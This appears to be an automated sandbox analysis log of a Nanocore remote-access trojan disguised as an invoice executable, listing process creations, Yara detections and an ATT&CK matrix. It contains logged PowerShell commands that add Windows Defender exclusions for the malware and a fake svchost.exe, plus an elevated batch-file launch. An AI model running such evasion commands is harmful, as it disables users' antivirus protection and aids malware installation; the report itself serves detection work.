Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe' -Force	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe' -Force	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe

Code function: 10_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,

10_2_00401C26

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe' -Force	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe' -Force	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Process created: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe' /SpecialRun 4101d8 5956	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1

Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run			Jump to behavior

Source: powershell.exe, 00000008.00000002.941411277.00000000038A0000.00000002.00000001.sdmp, explorer.exe, 00000015.00000002.923914274.0000000001640000.00000002.00000001.sdmp, svchost.exe, 00000016.00000002.924544232.0000000001600000.00000002.00000001.sdmp, explorer.exe, 00000019.00000002.921372618.0000000000BF0000.00000002.00000001.sdmp, svchost.exe, 0000001A.00000002.934096881.0000000001A90000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: powershell.exe, 00000008.00000002.941411277.00000000038A0000.00000002.00000001.sdmp, explorer.exe, 00000015.00000002.923914274.0000000001640000.00000002.00000001.sdmp, svchost.exe, 00000016.00000002.924544232.0000000001600000.00000002.00000001.sdmp, explorer.exe, 00000019.00000002.921372618.0000000000BF0000.00000002.00000001.sdmp, svchost.exe, 0000001A.00000002.934096881.0000000001A90000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: powershell.exe, 00000008.00000002.941411277.00000000038A0000.00000002.00000001.sdmp, explorer.exe, 00000015.00000002.923914274.0000000001640000.00000002.00000001.sdmp, svchost.exe, 00000016.00000002.924544232.0000000001600000.00000002.00000001.sdmp, explorer.exe, 00000019.00000002.921372618.0000000000BF0000.00000002.00000001.sdmp, svchost.exe, 0000001A.00000002.934096881.0000000001A90000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: powershell.exe, 00000008.00000002.941411277.00000000038A0000.00000002.00000001.sdmp, explorer.exe, 00000015.00000002.923914274.0000000001640000.00000002.00000001.sdmp, svchost.exe, 00000016.00000002.924544232.0000000001600000.00000002.00000001.sdmp, explorer.exe, 00000019.00000002.921372618.0000000000BF0000.00000002.00000001.sdmp, svchost.exe, 0000001A.00000002.934096881.0000000001A90000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Queries volume information: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe

Code function: 10_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread,

10_2_0040A272

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000016.00000002.954773732.0000000003D76000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.849818190.000000000405C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287989.exe PID: 7164, type: MEMORY
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.43b8aa0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4378a80.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4378a80.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.svchost.exe.3da9c08.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.svchost.exe.3d76de8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.43b8aa0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4358a60.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.svchost.exe.3da9c08.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4358a60.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.svchost.exe.3d76de8.5.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.849818190.000000000405C000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: svchost.exe, 00000016.00000002.954773732.0000000003D76000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000016.00000002.954773732.0000000003D76000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.849818190.000000000405C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287989.exe PID: 7164, type: MEMORY
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.43b8aa0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4378a80.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4378a80.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.svchost.exe.3da9c08.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.svchost.exe.3d76de8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.43b8aa0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4358a60.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.svchost.exe.3da9c08.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4358a60.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.svchost.exe.3d76de8.5.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Application Shimming1	Exploitation for Privilege Escalation1	Disable or Modify Tools11	OS Credential Dumping	File and Directory Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Command and Scripting Interpreter1	Windows Service1	Application Shimming1	Deobfuscate/Decode Files or Information1	LSASS Memory	System Information Discovery13	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Service Execution2	Registry Run Keys / Startup Folder11	Access Token Manipulation1	Obfuscated Files or Information3	Security Account Manager	Query Registry1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Remote Access Software1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
